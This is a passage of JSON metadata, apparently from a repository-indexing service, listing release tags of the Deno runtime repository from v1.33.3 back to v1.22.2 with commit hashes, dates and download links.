,"sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-